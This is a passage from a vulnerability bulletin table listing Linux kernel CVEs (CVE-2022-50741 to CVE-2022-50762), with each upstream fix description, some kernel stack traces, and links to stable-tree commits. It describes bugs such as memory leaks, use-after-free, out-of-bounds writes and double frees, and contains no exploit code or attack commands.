https://git.kernel.org/stable/c/c2a94de38c74e86f49124ac14f093d6a5c377a90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: imx-jpeg: Disable useless interrupt to avoid kernel panic There is a hardware bug where the STMBUF_HALF interrupt may be triggered after or while interrupts are being disabled. It may lead to an unexpected kernel panic. The STMBUF_HALF and STMBUF_RTND interrupts have no other effect, so disable them and the unused interrupts; meanwhile, clear the interrupt status when disabling interrupts. | 2025-12-24 | not yet calculated | CVE-2022-50741 | https://git.kernel.org/stable/c/ad31bc146f0e4521805695f4f99d8a3c3b2761f6 https://git.kernel.org/stable/c/f1257fc8fc988bdc4b26277f58bbf7b694b531f0 https://git.kernel.org/stable/c/35591c2469953d59abdb16cb7beac834052cdb4f https://git.kernel.org/stable/c/c3720e65c9013a7b2a5dbb63e6bf6d74a35dd894 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ocxl: fix possible refcount leak in afu_ioctl() eventfd_ctx_put needs to be called to put the refcount that was taken by eventfd_ctx_fdget when ocxl_irq_set_handler fails. | 2025-12-24 | not yet calculated | CVE-2022-50742 | https://git.kernel.org/stable/c/fc797285c40a9cc441357abb3521d3e51c743f67 https://git.kernel.org/stable/c/7ba19a60c74fb0057d4daef2fa2cbfc9522f3ba1 https://git.kernel.org/stable/c/11bd8bbdf8f6f5c1145bb158793107a57e3a1f07 https://git.kernel.org/stable/c/843433a02e344d30fbb62dfd834c60631baaa527 https://git.kernel.org/stable/c/66032c43291672bae8b93184d2806f05be3e16df https://git.kernel.org/stable/c/c3b69ba5114c860d730870c03ab4ee45276e5e35 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: Fix pcluster memleak when its block address is zero syzkaller reported a memleak: https://syzkaller.appspot.com/bug?id=62f37ff612f0021641eda5b17f056f1668aa9aed unreferenced object 0xffff88811009c7f8 (size 136): ... backtrace: [<ffffffff821db19b>] z_erofs_do_read_page+0x99b/0x1740 [<ffffffff821dee9e>] z_erofs_readahead+0x24e/0x580 [<ffffffff814bc0d6>] read_pages+0x86/0x3d0 ... syzkaller constructed a case: in z_erofs_register_pcluster(), ztailpacking = false and map->m_pa = zero. This makes pcl->obj.index zero although pcl is not an inline pcluster. Then the following path adds a refcount for grp, but the refcount won't be put because pcl is inline. z_erofs_readahead() z_erofs_do_read_page() # for another page z_erofs_collector_begin() erofs_find_workgroup() erofs_workgroup_get() Since it's illegal for the block address of a non-inlined pcluster to be zero, add a check here to avoid registering the pcluster which would be leaked. | 2025-12-24 | not yet calculated | CVE-2022-50743 | https://git.kernel.org/stable/c/ac54c1f7b288d83b6ba1e320efff24ecc21309cd https://git.kernel.org/stable/c/618e712b99c78d1004b70a1a9ab0a4830d0b2673 https://git.kernel.org/stable/c/c42c0ffe81176940bd5dead474216b7198d77675 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix hard lockup when reading the rx_monitor from debugfs During I/O and simultaneous cat of /sys/kernel/debug/lpfc/fnX/rx_monitor, a hard lockup similar to the call trace below may occur. The spin_lock_bh in lpfc_rx_monitor_report is not protecting from timer interrupts as expected, so change the strength of the spin lock to _irq. Kernel panic - not syncing: Hard LOCKUP CPU: 3 PID: 110402 Comm: cat Kdump: loaded exception RIP: native_queued_spin_lock_slowpath+91 [IRQ stack] native_queued_spin_lock_slowpath at ffffffffb814e30b _raw_spin_lock at ffffffffb89a667a lpfc_rx_monitor_record at ffffffffc0a73a36 [lpfc] lpfc_cmf_timer at ffffffffc0abbc67 [lpfc] __hrtimer_run_queues at ffffffffb8184250 hrtimer_interrupt at ffffffffb8184ab0 smp_apic_timer_interrupt at ffffffffb8a026ba apic_timer_interrupt at ffffffffb8a01c4f [End of IRQ stack] apic_timer_interrupt at ffffffffb8a01c4f lpfc_rx_monitor_report at ffffffffc0a73c80 [lpfc] lpfc_rx_monitor_read at ffffffffc0addde1 [lpfc] full_proxy_read at ffffffffb83e7fc3 vfs_read at ffffffffb833fe71 ksys_read at ffffffffb83402af do_syscall_64 at ffffffffb800430b entry_SYSCALL_64_after_hwframe at ffffffffb8a000ad | 2025-12-24 | not yet calculated | CVE-2022-50744 | https://git.kernel.org/stable/c/2cf66428a2545bb33beb9624124a2377468bb478 https://git.kernel.org/stable/c/cd542900ee5147028bbe603b238efcab8d720838 https://git.kernel.org/stable/c/39761417ea7b654217d6d9085afbf7c87ba3675d https://git.kernel.org/stable/c/c44e50f4a0ec00c2298f31f91bc2c3e9bbd81c7e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: media: tegra-video: fix device_node use after free At probe time this code path is followed: * tegra_csi_init * tegra_csi_channels_alloc * for_each_child_of_node(node, channel) -- iterates over channels * automatically gets 'channel' * tegra_csi_channel_alloc() * saves into chan->of_node a pointer to the channel OF node * automatically gets and puts 'channel' * now the node saved in chan->of_node has refcount 0, can disappear * tegra_csi_channels_init * iterates over channels * tegra_csi_channel_init -- uses chan->of_node After that, chan->of_node keeps storing the node until the device is removed. of_node_get() the node and of_node_put() it during teardown to avoid any risk. | 2025-12-24 | not yet calculated | CVE-2022-50745 | https://git.kernel.org/stable/c/5451efb2ca30f3c42b9efb8327ce35b62870dbd3 https://git.kernel.org/stable/c/ce50c612458091d926ccb05d7db11d9f93532db2 https://git.kernel.org/stable/c/6512c9498fcb97e7c760e3ef86b2272f2c0f765f https://git.kernel.org/stable/c/0fd003d3c708c80350a815eaf37b8e1114b976cf https://git.kernel.org/stable/c/c4d344163c3a7f90712525f931a6c016bbb35e18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: validate the extent length for uncompressed pclusters syzkaller reported a KASAN use-after-free: https://syzkaller.appspot.com/bug?extid=2ae90e873e97f1faf6f2 The referenced fuzzed image actually has two issues: - m_pa == 0 as a non-inlined pcluster; - The logical length is longer than its physical length. The first issue has already been addressed. This patch addresses the second issue by checking the extent length validity. | 2025-12-24 | not yet calculated | CVE-2022-50746 | https://git.kernel.org/stable/c/dc8b6bd587b13b85aff6e9d36cdfcd3f955cac9e https://git.kernel.org/stable/c/40c73b2ea9611b5388807be406f30f5e4e1162da https://git.kernel.org/stable/c/c505feba4c0d76084e56ec498ce819f02a7043ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: Fix OOB Write in hfs_asc2mac Syzbot reported an OOB Write bug: loop0: detected capacity change from 0 to 64 ================================================================== BUG: KASAN: slab-out-of-bounds in hfs_asc2mac+0x467/0x9a0 fs/hfs/trans.c:133 Write of size 1 at addr ffff88801848314e by task syz-executor391/3632 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x1b1/0x28e lib/dump_stack.c:106 print_address_description+0x74/0x340 mm/kasan/report.c:284 print_report+0x107/0x1f0 mm/kasan/report.c:395 kasan_report+0xcd/0x100 mm/kasan/report.c:495 hfs_asc2mac+0x467/0x9a0 fs/hfs/trans.c:133 hfs_cat_build_key+0x92/0x170 fs/hfs/catalog.c:28 hfs_lookup+0x1ab/0x2c0 fs/hfs/dir.c:31 lookup_open fs/namei.c:3391 [inline] open_last_lookups fs/namei.c:3481 [inline] path_openat+0x10e6/0x2df0 fs/namei.c:3710 do_filp_open+0x264/0x4f0 fs/namei.c:3740 If in->len is much larger than HFS_NAMELEN(31), which is the maximum length of an HFS filename, an OOB write could occur in hfs_asc2mac(). In that case, when dst reaches the boundary, srclen is still greater than 0, which causes an OOB write. Fix this by adding a check on dstlen in the while() before writing to the dst address. | 2025-12-24 | not yet calculated | CVE-2022-50747 | https://git.kernel.org/stable/c/8399318b13dc9e0569dee07ba2994098926d4fb2 https://git.kernel.org/stable/c/95040de81c629cd8d3c6ab5b50a8bd5088068303 https://git.kernel.org/stable/c/ba8f0ca386dd15acf5a93cbac932392c7818eab4 https://git.kernel.org/stable/c/6a95b17e4d4cd2d8278559f930b447f8c9c8cff9 https://git.kernel.org/stable/c/cff9fefdfbf5744afbb6d70bff2b49ec2065d23d https://git.kernel.org/stable/c/7af9cb8cbb81308ce4b06cc7164267faccbf75dd https://git.kernel.org/stable/c/ae21b03f904736eb2aa9bd119d2a14e741f1681f https://git.kernel.org/stable/c/88579c158e026860c61c4192531e8bc42f4bc642 https://git.kernel.org/stable/c/c53ed55cb275344086e32a7080a6b19cb183650b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipc: mqueue: fix possible memory leak in init_mqueue_fs() commit db7cfc380900 ("ipc: Free mq_sysctls if ipc namespace creation failed") Here's a similar memory leak to the one fixed by the patch above. retire_mq_sysctls needs to be called when init_mqueue_fs fails after setup_mq_sysctls. | 2025-12-24 | not yet calculated | CVE-2022-50748 | https://git.kernel.org/stable/c/a1f321051e0dcf2415fb94f81fdc5044cad4c1d6 https://git.kernel.org/stable/c/55b3709c6d68e32cd3fdd2a630b1f4c97d51b17c https://git.kernel.org/stable/c/c579d60f0d0cd87552f64fdebe68b5d941d20309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: acct: fix potential integer overflow in encode_comp_t() The integer overflow is described by the following code: > 317 static comp_t encode_comp_t(u64 value) > 318 { > 319 int exp, rnd; ...... > 341 exp <<= MANTSIZE; > 342 exp += value; > 343 return exp; > 344 } Currently comp_t is defined as type '__u16', but the variable 'exp' is of type 'int', so an overflow would happen when the variable 'exp' in line 343 is greater than 65535. | 2025-12-24 | not yet calculated | CVE-2022-50749 | https://git.kernel.org/stable/c/e93f995a591c352d35d89c518c54f790e1537754 https://git.kernel.org/stable/c/cf60bbca1b83a7e0927e36dbf178328982927886 https://git.kernel.org/stable/c/1750a0983c455a9b3badd848471fc8d58cb61f67 https://git.kernel.org/stable/c/a815a3e019456c94b03bd183e7ac22fd29e9e6fd https://git.kernel.org/stable/c/6edd0cdee5780fd5f43356b72b29a2a6d48ef6da https://git.kernel.org/stable/c/ebe16676e1dcaa4556ec4d36ca40c82e99e88cfa https://git.kernel.org/stable/c/2224897d8187dc22a83e05d9361efcccf67bcf12 https://git.kernel.org/stable/c/0aac6e60c464a5f942f995428e67f8ae1c422250 https://git.kernel.org/stable/c/c5f31c655bcc01b6da53b836ac951c1556245305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panel/panel-sitronix-st7701: Remove panel on DSI attach failure In case mipi_dsi_attach() fails, call drm_panel_remove() to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2022-50750 | https://git.kernel.org/stable/c/0b7c47b7f358f932159a9d5beec9616ef8a0c6b4 https://git.kernel.org/stable/c/576828e59a0e03bbc763872912b04f3e3a1b3311 https://git.kernel.org/stable/c/13fc167e1645c43c631d7752d98e377f0e4cbb15 https://git.kernel.org/stable/c/23fddf78eac8d79c56f93ab69b6c47a0816967c9 https://git.kernel.org/stable/c/465611e812587e72bf235034edce0e51be3d6809 https://git.kernel.org/stable/c/c62102165dd79284d42383d2f7ed17301bd8e629 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: configfs: fix possible memory leak in configfs_create_dir() kmemleak reported memory leaks in configfs_create_dir(): unreferenced object 0xffff888009f6af00 (size 192): comm "modprobe", pid 3777, jiffies 4295537735 (age 233.784s) backtrace: kmem_cache_alloc (mm/slub.c:3250 mm/slub.c:3256 mm/slub.c:3263 mm/slub.c:3273) new_fragment (./include/linux/slab.h:600 fs/configfs/dir.c:163) configfs_register_subsystem (fs/configfs/dir.c:1857) basic_write (drivers/hwtracing/stm/p_basic.c:14) stm_p_basic do_one_initcall (init/main.c:1296) do_init_module (kernel/module/main.c:2455) ... unreferenced object 0xffff888003ba7180 (size 96): comm "modprobe", pid 3777, jiffies 4295537735 (age 233.784s) backtrace: kmem_cache_alloc (mm/slub.c:3250 mm/slub.c:3256 mm/slub.c:3263 mm/slub.c:3273) configfs_new_dirent (./include/linux/slab.h:723 fs/configfs/dir.c:194) configfs_make_dirent (fs/configfs/dir.c:248) configfs_create_dir (fs/configfs/dir.c:296) configfs_attach_group.isra.28 (fs/configfs/dir.c:816 fs/configfs/dir.c:852) configfs_register_subsystem (fs/configfs/dir.c:1881) basic_write (drivers/hwtracing/stm/p_basic.c:14) stm_p_basic do_one_initcall (init/main.c:1296) do_init_module (kernel/module/main.c:2455) ... This is because the refcount is not correct in configfs_make_dirent(). For the normal path, the refcount changes as: configfs_register_subsystem() configfs_create_dir() configfs_make_dirent() configfs_new_dirent() # set s_count = 1 dentry->d_fsdata = configfs_get(sd); # s_count = 2 ... configfs_unregister_subsystem() configfs_remove_dir() remove_dir() configfs_remove_dirent() # s_count = 1 dput() ... *dentry_unlink_inode()* configfs_d_iput() # s_count = 0, release However, if we fail in configfs_create(): configfs_register_subsystem() configfs_create_dir() configfs_make_dirent() # s_count = 2 ... configfs_create() # fail ->out_remove: configfs_remove_dirent(dentry) configfs_put(sd) # s_count = 1 return PTR_ERR(inode); There is no inode in the error path, so the configfs_d_iput() is lost and the sd and fragment memory are leaked. To fix this, when we fail in configfs_create(), manually call configfs_put(sd) to keep the refcount correct. | 2025-12-24 | not yet calculated | CVE-2022-50751 | https://git.kernel.org/stable/c/90c38f57a821499391526b15cc944c265bd24e48 https://git.kernel.org/stable/c/74ac7c9ee2d486c501e7864c903f5098fc477acd https://git.kernel.org/stable/c/07f82dca112262b169bec0001378126439cab776 https://git.kernel.org/stable/c/8bc77754224a2c8581727ffe2e958119b4e27c8f https://git.kernel.org/stable/c/c72eb6e6e49a71f7598740786568fafdd013a227 https://git.kernel.org/stable/c/c65234b283a65cfbfc94619655e820a5e55199eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: Remove unnecessary bio_put() in raid5_read_one_chunk() When running chunk-sized reads on disks with badblocks duplicate bio free/puts are observed: ============================================================================= BUG bio-200 (Not tainted): Object already free ----------------------------------------------------------------------------- Allocated in mempool_alloc_slab+0x17/0x20 age=3 cpu=2 pid=7504 __slab_alloc.constprop.0+0x5a/0xb0 kmem_cache_alloc+0x31e/0x330 mempool_alloc_slab+0x17/0x20 mempool_alloc+0x100/0x2b0 bio_alloc_bioset+0x181/0x460 do_mpage_readpage+0x776/0xd00 mpage_readahead+0x166/0x320 blkdev_readahead+0x15/0x20 read_pages+0x13f/0x5f0 page_cache_ra_unbounded+0x18d/0x220 force_page_cache_ra+0x181/0x1c0 page_cache_sync_ra+0x65/0xb0 filemap_get_pages+0x1df/0xaf0 filemap_read+0x1e1/0x700 blkdev_read_iter+0x1e5/0x330 vfs_read+0x42a/0x570 Freed in mempool_free_slab+0x17/0x20 age=3 cpu=2 pid=7504 kmem_cache_free+0x46d/0x490 mempool_free_slab+0x17/0x20 mempool_free+0x66/0x190 bio_free+0x78/0x90 bio_put+0x100/0x1a0 raid5_make_request+0x2259/0x2450 md_handle_request+0x402/0x600 md_submit_bio+0xd9/0x120 __submit_bio+0x11f/0x1b0 submit_bio_noacct_nocheck+0x204/0x480 submit_bio_noacct+0x32e/0xc70 submit_bio+0x98/0x1a0 mpage_readahead+0x250/0x320 blkdev_readahead+0x15/0x20 read_pages+0x13f/0x5f0 page_cache_ra_unbounded+0x18d/0x220 Slab 0xffffea000481b600 objects=21 used=0 fp=0xffff8881206d8940 flags=0x17ffffc0010201(locked|slab|head|node=0|zone=2|lastcpupid=0x1fffff) CPU: 0 PID: 34525 Comm: kworker/u24:2 Not tainted 6.0.0-rc2-localyes-265166-gf11c5343fa3f #143 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Workqueue: raid5wq raid5_do_work Call Trace: <TASK> dump_stack_lvl+0x5a/0x78 dump_stack+0x10/0x16 print_trailer+0x158/0x165 object_err+0x35/0x50 free_debug_processing.cold+0xb7/0xbe __slab_free+0x1ae/0x330 kmem_cache_free+0x46d/0x490 mempool_free_slab+0x17/0x20 mempool_free+0x66/0x190 bio_free+0x78/0x90 bio_put+0x100/0x1a0 mpage_end_io+0x36/0x150 bio_endio+0x2fd/0x360 md_end_io_acct+0x7e/0x90 bio_endio+0x2fd/0x360 handle_failed_stripe+0x960/0xb80 handle_stripe+0x1348/0x3760 handle_active_stripes.constprop.0+0x72a/0xaf0 raid5_do_work+0x177/0x330 process_one_work+0x616/0xb20 worker_thread+0x2bd/0x6f0 kthread+0x179/0x1b0 ret_from_fork+0x22/0x30 </TASK> The double free is caused by an unnecessary bio_put() in the if(is_badblock(...)) error path in raid5_read_one_chunk(). The error path was moved ahead of bio_alloc_clone() in c82aa1b76787c ("md/raid5: move checking badblock before clone bio in raid5_read_one_chunk"). The previous code checked and freed align_bio which required a bio_put. After the move that is no longer needed as raid_bio is returned to the control of the common io path which performs its own endio resulting in a double free on bad device blocks. | 2025-12-24 | not yet calculated | CVE-2022-50752 | https://git.kernel.org/stable/c/7a37c58ee72e1fadd22c4ee990cb74c2ca2280e7 https://git.kernel.org/stable/c/c0fd5d4d8fd7b1a50306d7a23c720cf808f41fdf https://git.kernel.org/stable/c/21a9c7354aa59e97e26ece5f0a609c8bfa43020d https://git.kernel.org/stable/c/c66a6f41e09ad386fd2cce22b9cded837bbbc704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on summary info As Wenqing Liu reported in bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=216456 BUG: KASAN: use-after-free in recover_data+0x63ae/0x6ae0 [f2fs] Read of size 4 at addr ffff8881464dcd80 by task mount/1013 CPU: 3 PID: 1013 Comm: mount Tainted: G W 6.0.0-rc4 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Call Trace: dump_stack_lvl+0x45/0x5e print_report.cold+0xf3/0x68d kasan_report+0xa8/0x130 recover_data+0x63ae/0x6ae0 [f2fs] f2fs_recover_fsync_data+0x120d/0x1fc0 [f2fs] f2fs_fill_super+0x4665/0x61e0 [f2fs] mount_bdev+0x2cf/0x3b0 legacy_get_tree+0xed/0x1d0 vfs_get_tree+0x81/0x2b0 path_mount+0x47e/0x19d0 do_mount+0xce/0xf0 __x64_sys_mount+0x12c/0x1a0 do_syscall_64+0x38/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd The root cause is: in the fuzzed image, the SSA table is corrupted: ofs_in_node is larger than ADDRS_PER_PAGE(), resulting in an out-of-range access on a 4k-size page. - recover_data - do_recover_data - check_index_in_prev_nodes - f2fs_data_blkaddr This patch adds a sanity check on summary info in the recovery and GC flows, where those flows rely on it. After patch: [ 29.310883] F2FS-fs (loop0): Inconsistent ofs_in_node:65286 in summary, ino:0, nid:6, max:1018 | 2025-12-24 | not yet calculated | CVE-2022-50753 | https://git.kernel.org/stable/c/c99860f9a75079f339ed7670425b1ac58f26e2ff https://git.kernel.org/stable/c/4a8e8bf280703e04e0b9d91f101e1fdd9a5bd09e https://git.kernel.org/stable/c/73687c53919f49dff3852155621dab7a35c52854 https://git.kernel.org/stable/c/e168f819bfa42459b14f479e55ebd550bcc78899 https://git.kernel.org/stable/c/0922ad64ccefa3e483e84355942b86e13c8fea68 https://git.kernel.org/stable/c/c6ad7fd16657ebd34a87a97d9588195aae87597d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix a memleak in multi_transaction_new() In multi_transaction_new(), the variable t is not freed or passed out on the failure of copy_from_user(t->data, buf, size), which could lead to a memleak. Fix this bug by adding a put_multi_transaction(t) in the error path. | 2025-12-24 | not yet calculated | CVE-2022-50754 | https://git.kernel.org/stable/c/11d5fe7da67c3334cefc981297fd5defb78df15c https://git.kernel.org/stable/c/95e6adc6a7a4761ddf69ad713e55a06a3206309d https://git.kernel.org/stable/c/eb0f78e28cbc8f97439c0a4c80ee5160c1df5ce6 https://git.kernel.org/stable/c/935d86b29093e75b6c547d90b3979c2c2d23f1c4 https://git.kernel.org/stable/c/775a37ffa9f4681c4ad84c8634a7eec8af7098d4 https://git.kernel.org/stable/c/88989932c2269ea66074f52a6213598838f8b9e7 https://git.kernel.org/stable/c/3d27a436e294ac5d7a51bd5348ca63a42a468b35 https://git.kernel.org/stable/c/c73275cf6834787ca090317f1d20dbfa3b7f05aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udf: Avoid double brelse() in udf_rename() syzbot reported a warning like below [1]: VFS: brelse: Trying to free free buffer WARNING: CPU: 2 PID: 7301 at fs/buffer.c:1145 __brelse+0x67/0xa0 ... Call Trace: <TASK> invalidate_bh_lru+0x99/0x150 smp_call_function_many_cond+0xe2a/0x10c0 ? generic_remap_file_range_prep+0x50/0x50 ? __brelse+0xa0/0xa0 ? __mutex_lock+0x21c/0x12d0 ? smp_call_on_cpu+0x250/0x250 ? rcu_read_lock_sched_held+0xb/0x60 ? lock_release+0x587/0x810 ? __brelse+0xa0/0xa0 ? generic_remap_file_range_prep+0x50/0x50 on_each_cpu_cond_mask+0x3c/0x80 blkdev_flush_mapping+0x13a/0x2f0 blkdev_put_whole+0xd3/0xf0 blkdev_put+0x222/0x760 deactivate_locked_super+0x96/0x160 deactivate_super+0xda/0x100 cleanup_mnt+0x222/0x3d0 task_work_run+0x149/0x240 ? task_work_cancel+0x30/0x30 do_exit+0xb29/0x2a40 ? reacquire_held_locks+0x4a0/0x4a0 ? do_raw_spin_lock+0x12a/0x2b0 ? mm_update_next_owner+0x7c0/0x7c0 ? rwlock_bug.part.0+0x90/0x90 ? zap_other_threads+0x234/0x2d0 do_group_exit+0xd0/0x2a0 __x64_sys_exit_group+0x3a/0x50 do_syscall_64+0x34/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd The cause of the issue is that brelse() is called on both ofibh.sbh and ofibh.ebh by udf_find_entry() when it returns NULL. However, brelse() is called by udf_rename(), too. So, b_count on buffer_head becomes unbalanced. This patch fixes the issue by not calling brelse() by udf_rename() when udf_find_entry() returns NULL. | 2025-12-24 | not yet calculated | CVE-2022-50755 | https://git.kernel.org/stable/c/78eba2778ae10fb2a9d450e14d26eb6f6bf1f906 https://git.kernel.org/stable/c/9d2cad69547abea961fa80426d600b861de1952b https://git.kernel.org/stable/c/d6da7ec0f94f5208c848e0e94b70f54a0bd9c587 https://git.kernel.org/stable/c/156d440dea97deada629bb51cb17887abd862605 https://git.kernel.org/stable/c/40dba68d418237b1ae2beaa06d46a94dd946278e https://git.kernel.org/stable/c/e7a6a53c871460727be09f4414ccb29fb8697526 https://git.kernel.org/stable/c/4fca09045509f5bde8fc28e68fbca38cb4bdcf2e https://git.kernel.org/stable/c/090bf49833c51da297ec74f98ad2bf44daea9311 https://git.kernel.org/stable/c/c791730f2554a9ebb8f18df9368dc27d4ebc38c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: fix mempool alloc size Convert the max size to bytes to match the units of the divisor that calculates the worst-case number of PRP entries. The result is used to determine how many PRP Lists are required. The code was previously rounding this to 1 list, but we can require 2 in the worst case. In that scenario, the driver would corrupt memory beyond the size provided by the mempool. While unlikely to occur (you'd need a 4MB in exactly 127 phys segments on a queue that doesn't support SGLs), this memory corruption has been observed by kfence. | 2025-12-24 | not yet calculated | CVE-2022-50756 | https://git.kernel.org/stable/c/dfb6d54893d544151e7f480bc44cfe7823f5ad23 https://git.kernel.org/stable/c/9141144b37f30e3e7fa024bcfa0a13011e546ba9 https://git.kernel.org/stable/c/e1777b4286e526c58b4ee699344b0ad85aaf83a0 https://git.kernel.org/stable/c/b1814724e0d7162bdf4799f2d565381bc2251c63 https://git.kernel.org/stable/c/c89a529e823d51dd23c7ec0c047c7a454a428541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: camss: Clean up received buffers on failed start of streaming It is required to return the received buffers, if streaming can not be started. For instance media_pipeline_start() may fail with EPIPE, if a link validation between entities is not passed, and in such a case a user gets a kernel warning: WARNING: CPU: 1 PID: 520 at drivers/media/common/videobuf2/videobuf2-core.c:1592 vb2_start_streaming+0xec/0x160 <snip> Call trace: vb2_start_streaming+0xec/0x160 vb2_core_streamon+0x9c/0x1a0 vb2_ioctl_streamon+0x68/0xbc v4l_streamon+0x30/0x3c __video_do_ioctl+0x184/0x3e0 video_usercopy+0x37c/0x7b0 video_ioctl2+0x24/0x40 v4l2_ioctl+0x4c/0x70 The fix is to correct the error path in video_start_streaming() of camss. | 2025-12-24 | not yet calculated | CVE-2022-50757 | https://git.kernel.org/stable/c/75954cde8a5ca84003b24b6bf83197240935bd74 https://git.kernel.org/stable/c/04c734c716a97f1493b1edac41316aaed1d2a9d9 https://git.kernel.org/stable/c/fe443b3fe36cd23d4f5dc6d825d34322e7c89f0c https://git.kernel.org/stable/c/3d5cab726e3b370fea1b6e67183f0e13c409ce5c https://git.kernel.org/stable/c/d1c44928bb3ca0ec88e7ad5937a2a26a259aede6 https://git.kernel.org/stable/c/f05326a440dc31b91b688b2f3f15b7347894a50b https://git.kernel.org/stable/c/24df4fa3e795fb4b15fd4d3c036596e0978d265a https://git.kernel.org/stable/c/c8f3582345e6a69da65ab588f7c4c2d1685b0e80 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: vt6655: fix potential memory leak In function device_init_td0_ring, memory is allocated for member td_info of priv->apTD0Rings[i], with i increasing from 0. In case of allocation failure, the memory is freed in reversed order, with i decreasing to 0. However, the case i=0 is left out and thus memory is leaked. Modify the memory freeing loop to include the case i=0. | 2025-12-24 | not yet calculated | CVE-2022-50758 | https://git.kernel.org/stable/c/e741e38aa98704fbb959650ecd270b71b2670680 https://git.kernel.org/stable/c/16a45e78a687eb6c69acc4e62b94b6508b0bfbda https://git.kernel.org/stable/c/1b3cebeca99e8e0aa4fa57faac8dbf41e967317a https://git.kernel.org/stable/c/ff8551d411f12b5abc5ca929ab87643afa8a9588 https://git.kernel.org/stable/c/fb5f569bcda8f87bd47d8030bfae343d757fa3ea https://git.kernel.org/stable/c/cfdf139258614ef65b0f68b857ada5328fb7c0e5 https://git.kernel.org/stable/c/c8ff91535880d41b49699b3829fb6151942de29e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5648: Free V4L2 fwnode data on unbind The V4L2 fwnode data structure doesn't get freed on unbind, which leads to a memleak. | 2025-12-24 | not yet calculated | CVE-2022-50759 | https://git.kernel.org/stable/c/4a34fd4d9b548789d4a2018940edbec86282ed3b https://git.kernel.org/stable/c/3a54b72868930f07935accaf95ec4df639324940 https://git.kernel.org/stable/c/c95770e4fc172696dcb1450893cda7d6324d96fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix PCI device refcount leak in amdgpu_atrm_get_bios() As the comment of pci_get_class() says, it returns a pci_device with its refcount increased and decreases the refcount of the input parameter @from if it is not NULL. If we break the loop in amdgpu_atrm_get_bios() with 'pdev' not NULL, we need to call pci_dev_put() to decrease the refcount. Add the missing pci_dev_put() to avoid a refcount leak. | 2025-12-24 | not yet calculated | CVE-2022-50760 | https://git.kernel.org/stable/c/6611feef35c0c8c4d297b28a7fc6ab3a2c47eca7 https://git.kernel.org/stable/c/da7c78ea9e62bb65273d3ff19a3866ec205bfe18 https://git.kernel.org/stable/c/3360125d721c91d697c71201f18f042ff743e936 https://git.kernel.org/stable/c/981024abf5fe605c94d4f906f65d1b3408d628be https://git.kernel.org/stable/c/7c1ddf7c664b5bc91f14b1bdeaa45520ef1760e4 https://git.kernel.org/stable/c/8f2d2badf8ca5e7e7c30d88840b695c8af7286f3 https://git.kernel.org/stable/c/9d4057d0452243917e12eb19f1599c96f2f05b14 https://git.kernel.org/stable/c/a8b54ad7106c0604c4adc4933138b3557739bce0 https://git.kernel.org/stable/c/ca54639c7752edf1304d92ff4d0c049d4efc9ba0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/xen: Fix memory leak in xen_init_lock_cpu() In xen_init_lock_cpu(), @name is allocated as a new string by kasprintf(); if bind_ipi_to_irqhandler() fails, it should be freed, otherwise it may lead to a memory leak issue. Fix it. | 2025-12-24 | not yet calculated | CVE-2022-50761 | https://git.kernel.org/stable/c/9278bdbb566656b3704704f8dd6cbc24a6fcc569 https://git.kernel.org/stable/c/07764d00c869a3390bd4f80412cc8b0e669e6c58 https://git.kernel.org/stable/c/53ff99c76be611acea37d33133c9136969914865 https://git.kernel.org/stable/c/29198f667f4486f9e227e11faf1411fcf4c82a66 https://git.kernel.org/stable/c/70e7f308d7a8e915c7fbc0f1d959968eab8000cd https://git.kernel.org/stable/c/70966d6b0f59f795b08a70adf5e4478348ecbfbb https://git.kernel.org/stable/c/798fc3cf98ca07e448956f39295c5d686ab4b054 https://git.kernel.org/stable/c/b44457b83a034efef58ffa5f3131d4615f1a9837 https://git.kernel.org/stable/c/ca84ce153d887b1dc8b118029976cc9faf2a9b40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Avoid UBSAN error on true_sectors_per_clst() syzbot reported a UBSAN error as below: [ 76.901829][ T6677] ================================================================================ [ 76.903908][ T6677] UBSAN: shift-out-of-bounds in fs/ntfs3/super.c:675:13 [ 76.905363][ T6677] shift exponent -247 is negative This patch avoids this error. | 2025-12-24 | not yet calculated | CVE-2022-50762 | https://git.kernel.org/stable/c/4b51f27d4448c84957bce190292f75d4896d56b3 https://git.kernel.org/stable/c/8fe280ae85177c2323ae8c9849ff27a3a6b69506 https://git.kernel.org/stable/c/95afb464c86c6e9e95ea9e595282fa6f693072e8 https://git.kernel.org/stable/c/caad9dd8792a2622737b7273cb34835fd9536cd2 |
